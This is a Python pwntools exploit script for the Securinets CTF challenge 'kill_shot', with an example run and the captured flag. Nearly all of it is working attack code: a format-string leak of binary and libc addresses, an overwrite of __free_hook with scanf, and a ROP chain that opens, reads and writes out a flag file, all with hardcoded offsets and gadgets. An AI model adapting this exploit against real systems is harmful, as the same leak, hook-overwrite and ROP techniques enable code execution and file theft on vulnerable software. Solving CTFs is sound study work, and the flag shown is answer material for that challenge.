securinet - killshot
#!/usr/bin/env python3.8
"""
$ ./xp.py 3    # any argument selects the remote service, and argv[1] is also int()-parsed as the fd for read() in exploit(), so it must be numeric (e.g. 3); the literal "remote" would not parse
[+] Opening connection to bin.q21.ctfsecurinets.com on port 1338: Done
[*] step 1: leak stuff
[+] leaked addresses:
0x563765daa240
0x563765da9b10
0x7ffd0d86b5e0
0x169ebea30560a000
0x563765daa240
0x7f85cf4adb97
[+] found elf at 563765da9000
[+] found libc at 7f85cf48c000
[*] step 2: overwrite __free_hook with scanf
[+] overwritten __free_hook
[*] step 3: trigger stack overflow
[*] Switching to interactive mode
flag{this_really_needs_a_kill_shot!_cc5dcc74acd62fa74899efaff22d8f79}\x00\x00\x00\x00\x00\x00\x00\x00
"""
import os
import sys

import keystone  # not referenced in this file; kept from the author's template
from pwn import *
# context.log_level = "debug"
context.arch = "amd64"
context.terminal = ["tmux", "split-window", "-v", "-p 75"]

# Set to False by __main__ when a command-line argument selects the remote service.
LOCAL = True

# Target binary and the libc build it ran against.  Every hard-coded offset in
# exploit() (leak adjustments, gadgets, g_chunks) assumes exactly this pair.
TARGET_ELF = os.path.realpath("./kill_shot")
TARGET_LIBC = os.path.realpath("./libc.so.6")  # libc6_2.27-3ubuntu1.2_amd64.so
elf = ELF(TARGET_ELF)
libc = ELF(TARGET_LIBC)
def attach(r):
    """Attach gdb to the local process; a no-op when targeting the remote service.

    The breakpoint and command lists are the author's debugging scaffolding
    (gef-style ``bp``/``$_base()`` commands); everything but ``continue`` is
    commented out, so by default gdb simply attaches and resumes the target.
    """
    if not LOCAL:
        return
    breakpoints = [
        # elf.symbols["main"],
    ]
    commands = [
        # "heap-analysis-helper",
        # "bp * $_base() + 0x10a2", # step1
        # "bp * $_base() + 0x1167", # step2
        # "bp openat",
        "continue",
    ]
    script = [f"break *{bp:#x}" for bp in breakpoints] + commands
    gdb.attach(r, "\n".join(script))
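def alloc(r, data, sz=None):
    """Menu option 1: allocate a chunk of ``sz`` bytes and fill it with ``data``.

    Args:
        r: pwntools tube connected to the target.
        data: bytes sent verbatim at the ``Data: `` prompt (no newline is added,
            so include a NUL yourself if the target expects a C string).
        sz: size answered at the ``Size: `` prompt; ``None`` means ``len(data)``.
            An explicit ``0`` is honoured (the original ``if not sz`` silently
            replaced it with ``len(data)``).
    """
    if sz is None:
        sz = len(data)
    r.sendafter(b"3- exit\n", str(1))
    r.sendafter(b"Size: ", str(sz))
    r.sendafter(b"Data: ", data)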
def free(r, idx):
    """Menu option 2: free the chunk held in slot ``idx``.

    Answers are sent without a trailing newline, matching ``alloc``.
    """
    dialogue = (
        (b"3- exit\n", str(2)),
        (b"Index: ", str(idx)),
    )
    for prompt, answer in dialogue:
        r.sendafter(prompt, answer)
def leave(r):
    """Menu option 3: ask the target to exit.

    Unlike ``alloc``/``free`` this one uses ``sendlineafter``, i.e. the answer
    is newline-terminated.
    """
    r.sendlineafter(b"3- exit\n", str(3))
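# Gadget offsets are specific to the kill_shot binary and the libc build named
# at the top of the file; they were located by the author and are not
# re-derived here.  Re-check them before pointing this at another build.
_ELF_POP_RDI = 0x12a3      # pop rdi; ret
_LIBC_POP_RSI = 0x23e8a    # pop rsi; ret
_LIBC_LOAD_RSI = 0x524b9   # mov rsi, qword ptr [rsi + 0x70]; xor eax, eax; ret
_LIBC_POP_RDX = 0x1b96     # pop rdx; ret
_LEAK_SLOTS = range(20, 26)  # stack slots dumped with %N$p in step 1


def _rop_call(func, rdi, rdx, g_chunks):
    """Return the ROP entries for ``func(rdi, g_chunks[0], rdx)``.

    rsi is loaded indirectly: ``pop rsi`` takes ``g_chunks - 0x70`` and the
    ``mov rsi, [rsi + 0x70]`` gadget dereferences it, so rsi ends up as the
    heap pointer stored in ``g_chunks[0]`` -- the chunk holding the flag path.
    """
    return [
        p64(elf.address + _ELF_POP_RDI),
        p64(rdi),
        p64(libc.address + _LIBC_POP_RSI),
        p64(g_chunks - 0x70),
        p64(libc.address + _LIBC_LOAD_RSI),
        p64(libc.address + _LIBC_POP_RDX),
        p64(rdx),
        p64(func),
    ]


def exploit(r):
    """Run the three-stage exploit over tube ``r`` and drop into interactive mode.

    1. Format-string leak of stack slots 20..25 -> ELF base, libc base, canary.
    2. Arbitrary write via the ``Pointer:``/``Content:`` prompts: ``scanf``
       over ``__free_hook``.
    3. Chunk 0 holds the flag path, chunk 1 holds ``%4$s``.  Freeing chunk 1
       calls ``scanf("%4$s")`` through the hook, which reads our next line into
       a stack buffer and overflows into the return address with a ROP chain
       doing openat(0, path, 0) / read(fd, buf, 256) / write(1, buf, 256),
       where buf is chunk 0 itself.

    Returns 0 once the interactive session ends.
    Raises ValueError if argv[1] is present but not an integer, and
    RuntimeError if fewer than six pointers come back from the leak.
    """
    # The fd that read() should use.  Remotely it comes from argv[1] (any
    # argument also selects the remote target, see __main__).  Locally no
    # argument is given, so default to 3 -- the first free fd when only stdio
    # is open in the spawned process; adjust if the local target differs.
    # Parsed up front so a bad argument fails before the target is touched.
    fd = int(sys.argv[1]) if len(sys.argv) > 1 else 3

    info("step 1: leak stuff")
    fmt = b"".join(b"%%%d$p." % (slot,) for slot in _LEAK_SLOTS)
    r.sendafter(b"Format: ", fmt)
    fields = r.recvline().strip().split(b".")
    addresses = [int(x, 16) for x in fields if x.startswith(b"0x")]
    success("leaked addresses: ")
    for a in addresses:
        print(hex(a))
    if len(addresses) < len(_LEAK_SLOTS):
        raise RuntimeError(
            f"expected {len(_LEAK_SLOTS)} leaked pointers, got {len(addresses)}"
        )
    # Slot 22 looks like a stack pointer and slot 23 like the canary (low byte
    # 0x00); neither is needed for the chain, the canary is only logged.
    canary = addresses[3]
    elf.address = addresses[0] - 0x1240     # slot 20: pointer into the binary
    libc_leak = addresses[5] - 231          # slot 25: presumably __libc_start_main+231
    libc.address = libc_leak - 0x21ab0      # ... which this libc build places at 0x21ab0
    g_chunks = elf.address + 0x202080       # the binary's table of chunk pointers
    success(f"found elf at {elf.address:x}")
    success(f"found libc at {libc.address:x}")
    success(f"canary: {canary:#x}")

    info("step 2: overwrite __free_hook with scanf")
    r.sendafter(b"Pointer: ", str(libc.symbols["__free_hook"]))
    r.sendafter(b"Content: ", p64(libc.symbols["scanf"]))
    success("overwritten __free_hook")

    info("step 3: trigger stack overflow")
    flag_path = b"/tmp/flag.txt\0" if LOCAL else b"/home/ctf/flag.txt\0"
    alloc(r, flag_path, 0x100)  # chunk 0: NUL-terminated path, reused as the read()/write() buffer
    alloc(r, b"%4$s")           # chunk 1: becomes scanf()'s format string once freed
    free(r, 1)                  # __free_hook -> scanf("%4$s"): our next line lands on the stack
    rop = flat(
        # dirfd 0 is irrelevant because the path is absolute; flags 0 == O_RDONLY
        _rop_call(libc.symbols["openat"], 0, 0, g_chunks)
        + _rop_call(libc.symbols["read"], fd, 256, g_chunks)
        + _rop_call(libc.symbols["write"], 1, 256, g_chunks)
    )
    # 39 bytes of filler reach the saved return address on this binary (as
    # measured by the author).
    r.sendline(b"A" * 39 + rop)
    r.interactive()
    return 0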
if __name__ == "__main__":
    # Any command-line argument selects the remote service; exploit() also
    # int()-parses argv[1] as the fd for its read() call, so pass a number.
    LOCAL = len(sys.argv) < 2
    if LOCAL:
        r = process([elf.path], env={"LD_PRELOAD": libc.path})
    else:
        r = remote("bin.q21.ctfsecurinets.com", 1338)
    attach(r)
    exit(exploit(r))